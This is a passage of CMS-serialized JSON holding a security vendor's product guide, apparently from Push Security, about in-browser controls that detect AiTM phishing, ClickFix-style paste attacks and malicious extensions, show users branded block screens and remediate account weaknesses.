",{"data":25224,"content":25228,"nodeType":971},{"target":25225},{"sys":25226},{"id":25227,"type":976,"linkType":977},"2VZ4uw6MXslXME2ueydGuT",[],{"data":25230,"content":25231,"nodeType":1036},{},[25232,25236],{"data":25233,"marks":25234,"value":25235,"nodeType":883},{},[],"And t",{"data":25237,"marks":25238,"value":25240,"nodeType":883},{},[25239],{"type":916},"hat’s not all …",{"data":25242,"content":25243,"nodeType":879},{},[25244],{"data":25245,"marks":25246,"value":25247,"nodeType":883},{},[],"Push’s browser-based security platform also detects and blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, device code phishing, ClickFix, and session hijacking in real time. This includes the most prominent infostealer delivery vectors in terms of malvertising and *Fix-style attacks. Push analyzes every web page in every browser session and tab for threats, in real time, with no latency. ",{"data":25249,"content":25250,"nodeType":879},{},[25251],{"data":25252,"marks":25253,"value":25254,"nodeType":883},{},[],"But as we've established, you don't need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your attack surface.",{"data":25256,"content":25257,"nodeType":879},{},[25258,25261,25267,25270,25277,25280,25286],{"data":25259,"marks":25260,"value":16267,"nodeType":883},{},[],{"data":25262,"content":25263,"nodeType":940},{"uri":10222},[25264],{"data":25265,"marks":25266,"value":10228,"nodeType":883},{},[],{"data":25268,"marks":25269,"value":2524,"nodeType":883},{},[],{"data":25271,"content":25272,"nodeType":940},{"uri":10234},[25273],{"data":25274,"marks":25275,"value":16285,"nodeType":883},{},[25276],{"type":948},{"data":25278,"marks":25279,"value":10244,"nodeType":883},{},[],{"data":25281,"content":25282,"nodeType":940},{"uri":4772},[25283],{"data":25284,"marks":25285,"value":1751,"nodeType":883},{},[],{"data":25287,"marks":25288,"value":1350,"nodeType":883},{},[],"Unpacking the Vercel breach: A cautionary tale for Shadow AI and OAuth sprawl","In April 2026, Vercel was compromised via an OAuth app integrated into their Google Workspace tenant stemming from a compromised third-party AI SaaS provider.","2026-04-23T00:00:00.000Z","unpacking-the-vercel-breach",{"items":25294},[25295,25297],{"sys":25296,"name":3273},{"id":3272},{"sys":25298,"name":343},{"id":3276},{"items":25300},[25301],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":25302},{"url":872},"blog\u002Fintroducing-the-browser-and-identity-attacks-matrix",{"json":25305},{"data":25306,"content":25307,"nodeType":875},{},[25308],{"data":25309,"content":25310,"nodeType":879},{},[25311],{"data":25312,"marks":25313,"value":25314,"nodeType":883},{},[],"We're re-releasing the SaaS attack matrix as the Browser & Identity Attacks Matrix. Here's why we've decided to make the change and what you can expect to see more of in future.",{"id":7130,"publishedAt":25316},"2026-08-12T11:52:57.689Z",{"items":25318},[25319,25321],{"sys":25320,"name":3273},{"id":3272},{"sys":25322,"name":343},{"id":3276},{"items":25324},[25325,25327,25329,25331,25333,25335,25337,25339,25341,25343,25345,25347,25349,25351,25353,25355],{"sys":25326,"name":280,"slug":281,"tier":31},{"id":277},{"sys":25328,"name":415,"slug":416,"tier":31},{"id":412},{"sys":25330,"name":521,"slug":522,"tier":31},{"id":518},{"sys":25332,"name":641,"slug":642,"tier":31},{"id":638},{"sys":25334,"name":615,"slug":616,"tier":31},{"id":612},{"sys":25336,"name":262,"slug":263,"tier":45},{"id":259},{"sys":25338,"name":316,"slug":317,"tier":45},{"id":313},{"sys":25340,"name":361,"slug":362,"tier":45},{"id":358},{"sys":25342,"name":477,"slug":478,"tier":45},{"id":474},{"sys":25344,"name":512,"slug":513,"tier":45},{"id":509},{"sys":25346,"name":334,"slug":335,"tier":45},{"id":331},{"sys":25348,"name":424,"slug":425,"tier":45},{"id":421},{"sys":25350,"name":289,"slug":290,"tier":45},{"id":286},{"sys":25352,"name":486,"slug":487,"tier":45},{"id":483},{"sys":25354,"name":573,"slug":574,"tier":45},{"id":570},{"sys":25356,"name":450,"slug":451,"tier":45},{"id":447},"KeN5z465lyvbRDueJHHQu-xfDgeExBn9dQTgjMadkKc",{"id":25359,"title":25360,"authorsCollection":25361,"content":25365,"extension":228,"faqItemsCollection":26954,"faqTitle":59,"featured":6,"hashTags":59,"meta":26956,"metaTitle":26957,"ogImage":59,"postType":26958,"publishedDate":26959,"relatedBlogPostsCollection":26960,"slug":26962,"stem":26963,"subtitle":59,"summary":26964,"synopsis":26975,"sys":26976,"tagsCollection":26979,"topicsCollection":26985,"__hash__":27023},"blog\u002Fblog\u002Fguide-how-to-use-push-controls-to-protect-your-users-from-modern-attacks.json","Guide: How to use Push controls to protect your users from modern browser threats",{"items":25362},[25363],{"fullName":4797,"firstName":4798,"jobTitle":4799,"socialLinks":59,"profilePicture":25364},{"url":4801},{"json":25366,"links":26707},{"data":25367,"content":25368,"nodeType":875},{},[25369,25376,25399,25406,25412,25419,25426,25433,25439,25442,25450,25457,25463,25469,25485,25684,25696,25704,25711,25718,25725,25745,25751,25758,25761,25769,25776,25809,25816,25832,25853,25888,25894,25901,25920,25927,25934,25937,25945,25952,26045,26052,26059,26067,26074,26081,26088,26093,26101,26108,26115,26122,26128,26135,26143,26161,26169,26176,26182,26185,26193,26200,26207,26318,26324,26331,26338,26345,26352,26359,26367,26374,26381,26405,26411,26427,26442,26457,26463,26471,26478,26486,26493,26496,26504,26511,26543,26549,26571,26578,26581,26589,26596,26612,26618,26625,26632,26635,26642,26660,26667],{"data":25370,"content":25371,"nodeType":879},{},[25372],{"data":25373,"marks":25374,"value":25375,"nodeType":883},{},[],"Here are two things that can’t both be true:",{"data":25377,"content":25378,"nodeType":1531},{},[25379,25389],{"data":25380,"content":25381,"nodeType":1535},{},[25382],{"data":25383,"content":25384,"nodeType":879},{},[25385],{"data":25386,"marks":25387,"value":25388,"nodeType":883},{},[],"Users are the weakest link in security. They just need to stop clicking on things.",{"data":25390,"content":25391,"nodeType":1535},{},[25392],{"data":25393,"content":25394,"nodeType":879},{},[25395],{"data":25396,"marks":25397,"value":25398,"nodeType":883},{},[],"The internet is a giant clicking-on-things machine.",{"data":25400,"content":25401,"nodeType":879},{},[25402],{"data":25403,"marks":25404,"value":25405,"nodeType":883},{},[],"In particular, when we look at the TTPs of modern browser-based attacks that target employees, it’s obvious where this disconnect has real consequences. ",{"data":25407,"content":25411,"nodeType":971},{"target":25408},{"sys":25409},{"id":25410,"type":976,"linkType":977},"2x3blnHzZYcJ8c439C4NqI",[],{"data":25413,"content":25414,"nodeType":879},{},[25415],{"data":25416,"marks":25417,"value":25418,"nodeType":883},{},[],"Here’s why: Security tooling hasn’t kept up with adversary advances, and normal human behaviors are being expressly targeted via the browser to achieve compromise of accounts and endpoints. If you list the pitfalls facing the common end-user encountering these kinds of attack methods, the picture becomes even more stark.",{"data":25420,"content":25421,"nodeType":879},{},[25422],{"data":25423,"marks":25424,"value":25425,"nodeType":883},{},[],"To solve these problems, you need security tooling that sits in line with the user where they’re already working: In the browser. In this Push product guide, we’ll cover how you can use Push to provide point-in-time guidance — everything from block pages to informational banners — to protect users from modern browser-based TTPs and to guide them to remediate common vulnerabilities that can lead to account takeover.",{"data":25427,"content":25428,"nodeType":879},{},[25429],{"data":25430,"marks":25431,"value":25432,"nodeType":883},{},[],"We’ve also recently introduced custom branding and styling options for user-facing block pages and banners so you can provide a cohesive and trustworthy experience across your security ecosystem.",{"data":25434,"content":25438,"nodeType":971},{"target":25435},{"sys":25436},{"id":25437,"type":976,"linkType":977},"7fwCnr9bz76rWWCL6EReOT",[],{"data":25440,"content":25441,"nodeType":905},{},[],{"data":25443,"content":25444,"nodeType":909},{},[25445],{"data":25446,"marks":25447,"value":25449,"nodeType":883},{},[25448],{"type":916},"Why you can’t train users to recognize modern browser-based attack methods",{"data":25451,"content":25452,"nodeType":879},{},[25453],{"data":25454,"marks":25455,"value":25456,"nodeType":883},{},[],"User awareness training can help you build your workforce’s basic security baseline. But it’s not a reliable remedy for modern browser-based TTPs. When you look at the creative methods attackers are using — and rapidly improving on — it’s obvious why.",{"data":25458,"content":25462,"nodeType":971},{"target":25459},{"sys":25460},{"id":25461,"type":976,"linkType":977},"eHla7GPCH5eTpdfEqW5Zo",[],{"data":25464,"content":25468,"nodeType":971},{"target":25465},{"sys":25466},{"id":25467,"type":976,"linkType":977},"29vUtbEUam8fhbwnQdINRJ",[],{"data":25470,"content":25471,"nodeType":879},{},[25472,25476,25481],{"data":25473,"marks":25474,"value":25475,"nodeType":883},{},[],"To avoid account or endpoint compromise while going about your daily work as a user, you would need to accomplish these ",{"data":25477,"marks":25478,"value":25480,"nodeType":883},{},[25479],{"type":891},"extremely 100% achievable activities",{"data":25482,"marks":25483,"value":25484,"nodeType":883},{},[],", including:",{"data":25486,"content":25487,"nodeType":8845},{},[25488,25513,25553,25576,25610,25642],{"data":25489,"content":25490,"nodeType":8752},{},[25491,25502],{"data":25492,"content":25493,"nodeType":8740},{},[25494],{"data":25495,"content":25496,"nodeType":879},{},[25497],{"data":25498,"marks":25499,"value":25501,"nodeType":883},{},[25500],{"type":916},"Scenario",{"data":25503,"content":25504,"nodeType":8740},{},[25505],{"data":25506,"content":25507,"nodeType":879},{},[25508],{"data":25509,"marks":25510,"value":25512,"nodeType":883},{},[25511],{"type":916},"Threat",{"data":25514,"content":25515,"nodeType":8752},{},[25516,25539],{"data":25517,"content":25518,"nodeType":8766},{},[25519],{"data":25520,"content":25521,"nodeType":879},{},[25522,25526,25535],{"data":25523,"marks":25524,"value":25525,"nodeType":883},{},[],"While using search engines, never click on a ",{"data":25527,"content":25530,"nodeType":18112},{"target":25528},{"sys":25529},{"id":18334,"type":976,"linkType":977},[25531],{"data":25532,"marks":25533,"value":25534,"nodeType":883},{},[],"malicious link",{"data":25536,"marks":25537,"value":25538,"nodeType":883},{},[]," in sponsored or organic results (it's often the first link you see, too).",{"data":25540,"content":25541,"nodeType":8766},{},[25542],{"data":25543,"content":25544,"nodeType":879},{},[25545,25549],{"data":25546,"marks":25547,"value":25548,"nodeType":883},{},[],"M",{"data":25550,"marks":25551,"value":25552,"nodeType":883},{},[],"alvertising, SEO poisoning, compromised legitimate webpages, vibecoded phishing webpages.",{"data":25554,"content":25555,"nodeType":8752},{},[25556,25566],{"data":25557,"content":25558,"nodeType":8766},{},[25559],{"data":25560,"content":25561,"nodeType":879},{},[25562],{"data":25563,"marks":25564,"value":25565,"nodeType":883},{},[],"Know when to trust an email coming from an app you use every day, and when it could be malicious (it looks the same).",{"data":25567,"content":25568,"nodeType":8766},{},[25569],{"data":25570,"content":25571,"nodeType":879},{},[25572],{"data":25573,"marks":25574,"value":25575,"nodeType":883},{},[],"Using SaaS services to distribute malicious links using trusted sites (also a handy way of evading email controls).",{"data":25577,"content":25578,"nodeType":8752},{},[25579,25600],{"data":25580,"content":25581,"nodeType":8766},{},[25582],{"data":25583,"content":25584,"nodeType":879},{},[25585,25589,25597],{"data":25586,"marks":25587,"value":25588,"nodeType":883},{},[],"When reading a LinkedIn DM from a colleague, anticipate that they might have been hacked and have sent you a malicious link. (Yes, this was a ",{"data":25590,"content":25592,"nodeType":940},{"uri":25591},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fhow-push-stopped-a-high-risk-linkedin-spear-phishing-attack\u002F",[25593],{"data":25594,"marks":25595,"value":25596,"nodeType":883},{},[],"real scenario",{"data":25598,"marks":25599,"value":8591,"nodeType":883},{},[],{"data":25601,"content":25602,"nodeType":8766},{},[25603],{"data":25604,"content":25605,"nodeType":879},{},[25606],{"data":25607,"marks":25608,"value":25609,"nodeType":883},{},[],"Abuse of social media, IM platforms, and other apps where you can be directly contacted by users external to your organization. ",{"data":25611,"content":25612,"nodeType":8752},{},[25613,25623],{"data":25614,"content":25615,"nodeType":8766},{},[25616],{"data":25617,"content":25618,"nodeType":879},{},[25619],{"data":25620,"marks":25621,"value":25622,"nodeType":883},{},[],"When logging in to an app, never follow benign-seeming but actually malicious instructions to enter a code onto a legitimate page to complete your login.",{"data":25624,"content":25625,"nodeType":8766},{},[25626],{"data":25627,"content":25628,"nodeType":879},{},[25629,25633,25639],{"data":25630,"marks":25631,"value":25632,"nodeType":883},{},[],"AiTM phishing, OAuth consent phishing, ",{"data":25634,"content":25635,"nodeType":940},{"uri":2443},[25636],{"data":25637,"marks":25638,"value":2195,"nodeType":883},{},[],{"data":25640,"marks":25641,"value":1350,"nodeType":883},{},[],{"data":25643,"content":25644,"nodeType":8752},{},[25645,25655],{"data":25646,"content":25647,"nodeType":8766},{},[25648],{"data":25649,"content":25650,"nodeType":879},{},[25651],{"data":25652,"marks":25653,"value":25654,"nodeType":883},{},[],"Know which instructions to follow and which are malicious when verifying that you're human on a CAPTCHA-style page.",{"data":25656,"content":25657,"nodeType":8766},{},[25658],{"data":25659,"content":25660,"nodeType":879},{},[25661,25664,25670,25674,25680],{"data":25662,"marks":25663,"value":21,"nodeType":883},{},[],{"data":25665,"content":25666,"nodeType":940},{"uri":12974},[25667],{"data":25668,"marks":25669,"value":316,"nodeType":883},{},[],{"data":25671,"marks":25672,"value":25673,"nodeType":883},{},[],"-style attacks that trick the user into running a malicious script or command, or ",{"data":25675,"content":25676,"nodeType":940},{"uri":1331},[25677],{"data":25678,"marks":25679,"value":1321,"nodeType":883},{},[],{"data":25681,"marks":25682,"value":25683,"nodeType":883},{},[]," (which is even sneakier and simply involves copying a URL).",{"data":25685,"content":25686,"nodeType":879},{},[25687,25691],{"data":25688,"marks":25689,"value":25690,"nodeType":883},{},[],"And we're barely scratching the surface here. ",{"data":25692,"marks":25693,"value":25695,"nodeType":883},{},[25694],{"type":916},"Easy, right?",{"data":25697,"content":25698,"nodeType":1036},{},[25699],{"data":25700,"marks":25701,"value":25703,"nodeType":883},{},[25702],{"type":916},"Can't we block users from interacting with bad content? ",{"data":25705,"content":25706,"nodeType":879},{},[25707],{"data":25708,"marks":25709,"value":25710,"nodeType":883},{},[],"So if you can’t train your way out of these problems, what about locking down and blocking your way out of the problem?",{"data":25712,"content":25713,"nodeType":879},{},[25714],{"data":25715,"marks":25716,"value":25717,"nodeType":883},{},[],"This, too, simply isn’t really feasible. ",{"data":25719,"content":25720,"nodeType":879},{},[25721],{"data":25722,"marks":25723,"value":25724,"nodeType":883},{},[],"Modern cloud-first adversaries routinely rotate domains on malicious pages; use trusted services like SharePoint, Adobe, Google Sites, Cloudflare, and Atlassian to deliver lures; target end-users across multiple channels, including social media, forums, chat platforms, Google search results, email, and webpages; and use legitimate security tools like bot protection to bypass detection by other legitimate security tools, such as web content scanning and analysis solutions.",{"data":25726,"content":25727,"nodeType":879},{},[25728,25732,25736,25741],{"data":25729,"marks":25730,"value":25731,"nodeType":883},{},[],"To safely navigate the internet today, y",{"data":25733,"marks":25734,"value":25735,"nodeType":883},{},[],"ou need to be able to spot malicious pages and content ",{"data":25737,"marks":25738,"value":25740,"nodeType":883},{},[25739],{"type":916},"the first time they're seen in the wild",{"data":25742,"marks":25743,"value":25744,"nodeType":883},{},[],". If you're relying on indicators of known bad, you're always a step behind, leaving users exposed.",{"data":25746,"content":25750,"nodeType":971},{"target":25747},{"sys":25748},{"id":25749,"type":976,"linkType":977},"3ZfqOLRdJZJIc78rj9E9JZ",[],{"data":25752,"content":25753,"nodeType":879},{},[25754],{"data":25755,"marks":25756,"value":25757,"nodeType":883},{},[],"To protect users while they work online, you need a purpose-built security tool that can respond in real time to modern TTPs and guide users securely — without introducing extra work or a lot of friction. Push can help with that.",{"data":25759,"content":25760,"nodeType":905},{},[],{"data":25762,"content":25763,"nodeType":909},{},[25764],{"data":25765,"marks":25766,"value":25768,"nodeType":883},{},[25767],{"type":916},"Why in-browser controls?",{"data":25770,"content":25771,"nodeType":879},{},[25772],{"data":25773,"marks":25774,"value":25775,"nodeType":883},{},[],"Simply put, using in-browser security controls gets you the closest to the user and their work in order to protect them from modern browser-based threats. Adding in-browser controls also solves two tricky problems for security teams: ",{"data":25777,"content":25778,"nodeType":1531},{},[25779,25794],{"data":25780,"content":25781,"nodeType":1535},{},[25782],{"data":25783,"content":25784,"nodeType":879},{},[25785,25790],{"data":25786,"marks":25787,"value":25789,"nodeType":883},{},[25788],{"type":916},"Filling the gap between solution layers",{"data":25791,"marks":25792,"value":25793,"nodeType":883},{},[]," in order to detect and block attack methods like Adversary-in-the-Middle phishing, malicious browser extensions, and ClickFix-style social engineering attacks that other tools miss.",{"data":25795,"content":25796,"nodeType":1535},{},[25797],{"data":25798,"content":25799,"nodeType":879},{},[25800,25805],{"data":25801,"marks":25802,"value":25804,"nodeType":883},{},[25803],{"type":916},"Providing just-in-time security enforcement",{"data":25806,"marks":25807,"value":25808,"nodeType":883},{},[]," to end-users when it’s the right moment to act on that guidance, reducing your attack surface across your online apps, browser extensions, and accounts, and ensuring your app usage policies are followed.",{"data":25810,"content":25811,"nodeType":1036},{},[25812],{"data":25813,"marks":25814,"value":25815,"nodeType":883},{},[],"Fill the gap between solution layers",{"data":25817,"content":25818,"nodeType":879},{},[25819,25823,25828],{"data":25820,"marks":25821,"value":25822,"nodeType":883},{},[],"Most existing security solutions operate just ",{"data":25824,"marks":25825,"value":25827,"nodeType":883},{},[25826],{"type":891},"outside",{"data":25829,"marks":25830,"value":25831,"nodeType":883},{},[]," the context of a user interacting with a webpage. This leaves blind spots that attackers are exploiting between layers of security tooling.",{"data":25833,"content":25834,"nodeType":879},{},[25835,25839,25849],{"data":25836,"marks":25837,"value":25838,"nodeType":883},{},[],"For example, network proxies see HTTP requests, URLs, and page headers, but not the ",{"data":25840,"content":25844,"nodeType":18112},{"target":25841},{"sys":25842},{"id":25843,"type":976,"linkType":977},"5caCcGCqMMPm5KlwUv0sbz",[25845],{"data":25846,"marks":25847,"value":25848,"nodeType":883},{},[],"structural elements",{"data":25850,"marks":25851,"value":25852,"nodeType":883},{},[]," of the DOM or on-page user interactions that are key to fingerprinting the behavior of AiTM phishing kits or ClickFix-style social engineering attacks. ",{"data":25854,"content":25855,"nodeType":879},{},[25856,25860,25870,25874,25884],{"data":25857,"marks":25858,"value":25859,"nodeType":883},{},[],"Similarly, ",{"data":25861,"content":25865,"nodeType":18112},{"target":25862},{"sys":25863},{"id":25864,"type":976,"linkType":977},"6YWYKGESlyUKQxvhKmBzeH",[25866],{"data":25867,"marks":25868,"value":25869,"nodeType":883},{},[],"EDR tools",{"data":25871,"marks":25872,"value":25873,"nodeType":883},{},[]," only see the bad thing when it hits the endpoint, and many ",{"data":25875,"content":25879,"nodeType":18112},{"target":25876},{"sys":25877},{"id":25878,"type":976,"linkType":977},"2k2aDK5dyQKlQBrk66pMXE",[25880],{"data":25881,"marks":25882,"value":25883,"nodeType":883},{},[],"cloud security tools",{"data":25885,"marks":25886,"value":25887,"nodeType":883},{},[]," rely on complex policy configurations across a core set of apps to provide security protection — leaving a gap in detection and response capabilities outside their purview.",{"data":25889,"content":25893,"nodeType":971},{"target":25890},{"sys":25891},{"id":25892,"type":976,"linkType":977},"50NyBpr96dKspvTzJTBOlC",[],{"data":25895,"content":25896,"nodeType":1036},{},[25897],{"data":25898,"marks":25899,"value":25900,"nodeType":883},{},[],"Provide just-in-time security enforcement",{"data":25902,"content":25903,"nodeType":879},{},[25904,25908,25916],{"data":25905,"marks":25906,"value":25907,"nodeType":883},{},[],"As some of our customers like to say, Push provides security teams with a ",{"data":25909,"content":25911,"nodeType":940},{"uri":25910},"\u002Fcustomer-stories\u002Fupvest",[25912],{"data":25913,"marks":25914,"value":25915,"nodeType":883},{},[],"“seat on the user’s side”",{"data":25917,"marks":25918,"value":25919,"nodeType":883},{},[]," of the equation so you can enforce security best practices.",{"data":25921,"content":25922,"nodeType":879},{},[25923],{"data":25924,"marks":25925,"value":25926,"nodeType":883},{},[],"Having that seat on the user’s side also helps you deliver guidance in the right context for it to be followed: When the user is engaged in doing the behavior you want to influence (or prevent). The right information, at the right time, in the right format — not a belated reminder through a different channel that’s easy to ignore.",{"data":25928,"content":25929,"nodeType":879},{},[25930],{"data":25931,"marks":25932,"value":25933,"nodeType":883},{},[],"With those outcomes in mind, let’s look at some specific solutions from the Push platform.",{"data":25935,"content":25936,"nodeType":905},{},[],{"data":25938,"content":25939,"nodeType":909},{},[25940],{"data":25941,"marks":25942,"value":25944,"nodeType":883},{},[25943],{"type":916},"How Push helps you protect users from browser-based ATO, ClickFix, and similar attacks",{"data":25946,"content":25947,"nodeType":879},{},[25948],{"data":25949,"marks":25950,"value":25951,"nodeType":883},{},[],"The Push platform provides out-of-the-box detections for browser-based attacks, including:",{"data":25953,"content":25954,"nodeType":1531},{},[25955,25978,26001,26022],{"data":25956,"content":25957,"nodeType":1535},{},[25958],{"data":25959,"content":25960,"nodeType":879},{},[25961,25964,25974],{"data":25962,"marks":25963,"value":21,"nodeType":883},{},[],{"data":25965,"content":25969,"nodeType":18112},{"target":25966},{"sys":25967},{"id":25968,"type":976,"linkType":977},"7KRnTSnJAbbiho69gNyN0B",[25970],{"data":25971,"marks":25972,"value":25973,"nodeType":883},{},[],"AiTM phishing kits",{"data":25975,"marks":25976,"value":25977,"nodeType":883},{},[]," that can bypass MFA",{"data":25979,"content":25980,"nodeType":1535},{},[25981],{"data":25982,"content":25983,"nodeType":879},{},[25984,25987,25997],{"data":25985,"marks":25986,"value":21,"nodeType":883},{},[],{"data":25988,"content":25992,"nodeType":18112},{"target":25989},{"sys":25990},{"id":25991,"type":976,"linkType":977},"jN3GN5ddMJZiDtl0fgUVd",[25993],{"data":25994,"marks":25995,"value":25996,"nodeType":883},{},[],"Cloned login pages",{"data":25998,"marks":25999,"value":26000,"nodeType":883},{},[]," designed to steal user credentials",{"data":26002,"content":26003,"nodeType":1535},{},[26004],{"data":26005,"content":26006,"nodeType":879},{},[26007,26010,26019],{"data":26008,"marks":26009,"value":21,"nodeType":883},{},[],{"data":26011,"content":26015,"nodeType":18112},{"target":26012},{"sys":26013},{"id":26014,"type":976,"linkType":977},"5NyiWgjMDwk16XZ0S681JK",[26016],{"data":26017,"marks":26018,"value":713,"nodeType":883},{},[],{"data":26020,"marks":26021,"value":21,"nodeType":883},{},[],{"data":26023,"content":26024,"nodeType":1535},{},[26025],{"data":26026,"content":26027,"nodeType":879},{},[26028,26031,26041],{"data":26029,"marks":26030,"value":21,"nodeType":883},{},[],{"data":26032,"content":26036,"nodeType":18112},{"target":26033},{"sys":26034},{"id":26035,"type":976,"linkType":977},"7jygmadjoz0asAHv7e5PuK",[26037],{"data":26038,"marks":26039,"value":26040,"nodeType":883},{},[],"Malicious copy and paste attacks",{"data":26042,"marks":26043,"value":26044,"nodeType":883},{},[]," like ClickFix, FileFix, and similar",{"data":26046,"content":26047,"nodeType":879},{},[26048],{"data":26049,"marks":26050,"value":26051,"nodeType":883},{},[],"For each of these attack vectors, Push delivers detection events and associated metadata for quick triage by the security team, as well as employee-facing warn or block screens, based on your selected configuration.",{"data":26053,"content":26054,"nodeType":879},{},[26055],{"data":26056,"marks":26057,"value":26058,"nodeType":883},{},[],"Here’s a snapshot of the capabilities of these controls and what end-users will experience.",{"data":26060,"content":26061,"nodeType":1036},{},[26062],{"data":26063,"marks":26064,"value":26066,"nodeType":883},{},[26065],{"type":916},"The scenario:",{"data":26068,"content":26069,"nodeType":879},{},[26070],{"data":26071,"marks":26072,"value":26073,"nodeType":883},{},[],"When a user encounters a malicious page — whether that’s an AiTM phishing tool running on a webpage, or a ClickFix-style attack — or attempts to install a malicious extension, Push immediately steps in. ",{"data":26075,"content":26076,"nodeType":879},{},[26077],{"data":26078,"marks":26079,"value":26080,"nodeType":883},{},[],"Push can prevent users from entering their credentials on phishing pages, including cloned login pages, or from pasting malicious clipboard contents that can run malware on their device. Push can also prevent users from installing known-bad browser extensions. ",{"data":26082,"content":26083,"nodeType":879},{},[26084],{"data":26085,"marks":26086,"value":26087,"nodeType":883},{},[],"In each of these scenarios, Push admins get detailed detection information they can use to triage the incident.",{"data":26089,"content":26092,"nodeType":971},{"target":26090},{"sys":26091},{"id":18425,"type":976,"linkType":977},[],{"data":26094,"content":26095,"nodeType":1036},{},[26096],{"data":26097,"marks":26098,"value":26100,"nodeType":883},{},[26099],{"type":916},"How it works:",{"data":26102,"content":26103,"nodeType":879},{},[26104],{"data":26105,"marks":26106,"value":26107,"nodeType":883},{},[],"Rather than relying on known-bad intelligence like domains or URLs, Push performs a behavioral and structural analysis of malicious pages in real time.",{"data":26109,"content":26110,"nodeType":879},{},[26111],{"data":26112,"marks":26113,"value":26114,"nodeType":883},{},[],"That means a phishing page never has to appear in a threat intelligence feed in order to be detected and blocked.",{"data":26116,"content":26117,"nodeType":879},{},[26118],{"data":26119,"marks":26120,"value":26121,"nodeType":883},{},[],"Similarly, for malicious copy and paste attacks like ClickFix, Push analyzes the content copied to the clipboard but also evaluates the context of the page to reduce false positives. In blocking mode, Push’s control for ClickFix-style attacks replaces the malicious clipboard contents with safe text — preventing potential endpoint compromise before it can occur.",{"data":26123,"content":26127,"nodeType":971},{"target":26124},{"sys":26125},{"id":26126,"type":976,"linkType":977},"3OkejjEjV9xflBc5ouOVFn",[],{"data":26129,"content":26130,"nodeType":879},{},[26131],{"data":26132,"marks":26133,"value":26134,"nodeType":883},{},[],"Finally, for identifying malicious browser extensions, Push takes a slightly different approach — combining both behavioral detections and curated intelligence of known-bad extensions from our own research and from trusted industry sources. We’ve found this combination provides the highest-fidelity way to identify malicious extensions without relying on approaches like analyzing extension permissions, which often isn’t actionable. ",{"data":26136,"content":26137,"nodeType":1036},{},[26138],{"data":26139,"marks":26140,"value":26142,"nodeType":883},{},[26141],{"type":916},"Your security team gets:",{"data":26144,"content":26145,"nodeType":879},{},[26146,26150,26158],{"data":26147,"marks":26148,"value":26149,"nodeType":883},{},[],"Readymade detection and alerting, combined with detailed telemetry. Detections and their associated metadata can be consumed via ",{"data":26151,"content":26153,"nodeType":940},{"uri":26152},"\u002Fhelp\u002Faudience\u002Fadministrators\u002Fdocs\u002Fgetting-started\u002F#api-and-webhooks",[26154],{"data":26155,"marks":26156,"value":26157,"nodeType":883},{},[],"Push’s REST API and webhooks",{"data":26159,"marks":26160,"value":6141,"nodeType":883},{},[],{"data":26162,"content":26163,"nodeType":1036},{},[26164],{"data":26165,"marks":26166,"value":26168,"nodeType":883},{},[26167],{"type":916},"Your end-users see:",{"data":26170,"content":26171,"nodeType":879},{},[26172],{"data":26173,"marks":26174,"value":26175,"nodeType":883},{},[],"An immediate block screen in your company colors and brand style, providing a highly memorable, contextual moment of learning — and reassuring them that an incident has been prevented.",{"data":26177,"content":26181,"nodeType":971},{"target":26178},{"sys":26179},{"id":26180,"type":976,"linkType":977},"4QfjDDfKjohKr1qqDLRT0m",[],{"data":26183,"content":26184,"nodeType":905},{},[],{"data":26186,"content":26187,"nodeType":909},{},[26188],{"data":26189,"marks":26190,"value":26192,"nodeType":883},{},[26191],{"type":916},"How Push helps you remediate account vulnerabilities at scale",{"data":26194,"content":26195,"nodeType":879},{},[26196],{"data":26197,"marks":26198,"value":26199,"nodeType":883},{},[],"Just-in-time security enforcement works best when it’s trustworthy and contextual — without making a lot more work for your team. Push also provides readymade controls for remediating common account vulnerabilities that contribute to your attack surface online, helping you harden existing accounts and reduce behaviors that introduce new risks.",{"data":26201,"content":26202,"nodeType":879},{},[26203],{"data":26204,"marks":26205,"value":26206,"nodeType":883},{},[],"With Push, you can:",{"data":26208,"content":26209,"nodeType":1531},{},[26210,26233,26271,26295],{"data":26211,"content":26212,"nodeType":1535},{},[26213],{"data":26214,"content":26215,"nodeType":879},{},[26216,26219,26229],{"data":26217,"marks":26218,"value":21,"nodeType":883},{},[],{"data":26220,"content":26224,"nodeType":18112},{"target":26221},{"sys":26222},{"id":26223,"type":976,"linkType":977},"6FYHbkcRUrtznPo7RarRsz",[26225],{"data":26226,"marks":26227,"value":26228,"nodeType":883},{},[],"Prevent the phishing or reuse of high-value passwords",{"data":26230,"marks":26231,"value":26232,"nodeType":883},{},[],", like your IdP, AWS, or code repository passwords.",{"data":26234,"content":26235,"nodeType":1535},{},[26236],{"data":26237,"content":26238,"nodeType":879},{},[26239,26243,26253,26257,26267],{"data":26240,"marks":26241,"value":26242,"nodeType":883},{},[],"Remediate ",{"data":26244,"content":26248,"nodeType":18112},{"target":26245},{"sys":26246},{"id":26247,"type":976,"linkType":977},"2WAc5HflKonFN7Jc53ROgj",[26249],{"data":26250,"marks":26251,"value":26252,"nodeType":883},{},[],"missing MFA",{"data":26254,"marks":26255,"value":26256,"nodeType":883},{},[]," or ",{"data":26258,"content":26262,"nodeType":18112},{"target":26259},{"sys":26260},{"id":26261,"type":976,"linkType":977},"2dAP36chda6ZDGKzw0Itfs",[26263],{"data":26264,"marks":26265,"value":26266,"nodeType":883},{},[],"insecure passwords",{"data":26268,"marks":26269,"value":26270,"nodeType":883},{},[]," on any work app, even those not managed by your SSO solution.",{"data":26272,"content":26273,"nodeType":1535},{},[26274],{"data":26275,"content":26276,"nodeType":879},{},[26277,26281,26291],{"data":26278,"marks":26279,"value":26280,"nodeType":883},{},[],"Use ",{"data":26282,"content":26286,"nodeType":18112},{"target":26283},{"sys":26284},{"id":26285,"type":976,"linkType":977},"2ZpKnuljaUH0jzVaae4SMN",[26287],{"data":26288,"marks":26289,"value":26290,"nodeType":883},{},[],"in-browser banners",{"data":26292,"marks":26293,"value":26294,"nodeType":883},{},[]," to add guardrails to app usage, including blocking unapproved SaaS or collecting a business reason to access an app before approving 